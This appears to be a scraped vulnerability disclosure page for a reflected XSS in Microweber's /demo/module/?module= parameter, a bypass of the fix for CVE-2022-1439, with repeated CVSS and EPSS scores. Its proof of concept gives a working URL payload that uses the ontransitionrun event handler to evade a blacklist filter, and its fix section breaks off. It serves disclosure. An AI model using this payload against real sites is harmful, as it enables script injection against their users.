WfinnB8E5C324-3DFE-46B4-8095-1697C6B0A6D6XSS in /demo/module/?module=HERE
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
0.001 Low
EPSS
Percentile
27.5%
Description
Reflected XSS in /demo/module/?module= bypass of fix for CVE-2022-1439
Proof of Concept
In this report I showed an XSS and while one of the filter evasion mechanisms was fixed, the root cause persists to allow other payloads.
As I mentioned there are event handlers which are unblocked, so even without the <x> trick from last report, you can get XSS.
Here I use ontransitionrun, there are more and there will always come more event handlers, so a blacklist approach will fail here.
https://demo.microweber.org/demo/module/?module=%27ontransitionrun=alert(1)%27%22tabindex=1&style=transition:outline%200.001s&id=x&data-show-ui=admin&class=x&from_url=https://demo.microweber.org
Hitting “tab” will fire the payload.
How to fix this
The html looks like this:
<div>Related
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
0.001 Low
EPSS
Percentile
27.5%